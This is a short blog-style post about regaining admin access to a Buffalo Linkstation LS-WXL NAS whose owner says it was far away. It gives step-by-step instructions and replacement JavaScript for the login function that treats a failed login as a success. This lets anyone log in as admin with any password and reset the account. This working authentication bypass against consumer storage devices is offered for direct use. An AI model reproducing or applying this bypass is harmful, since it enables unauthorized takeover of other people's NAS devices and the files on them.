Buffalo Linkstation (LS-WXL) – Admin hack

Long story short I needed access to this NAS and it was on the other side of the planet so a little creative coding came to the rescue.

With developer tools enabled (I used Chrome).

• Get to the login page
• Open dev tools sources tab
• Open login_utis.js under the ‘authentication’ folder
• Replace the login function with the following:

function login(f, lang) {if (login_lock != 0) {return;}login_lock = 1;
var uid = Ext.getCmp(‘user’);var uid_value = uid.getValue();var pwd = Ext.getCmp(‘password’);var pwd_value = pwd.getValue();
f.form.submit({url: ‘/dynamic.pl’,params: {bufaction: ‘verifyLogin’},waitTitle: S(‘Please Wait…’),waitMsg: S(‘Logging In…’),success: function(form, action){var decodedResponse= Ext.decode(action.response.responseText);var jsonData = decodedResponse.data;loginSuccess(f, action, uid_value, lang);},failure: function(form, action){loginSuccess(f, action, uid_value, lang);}});};

• Hit Ctrl+S (save the change)
• Login as admin with any password. I used admin/admin
• Reset the admin account with a new password.

Bad security in this case saved a lot of hassle.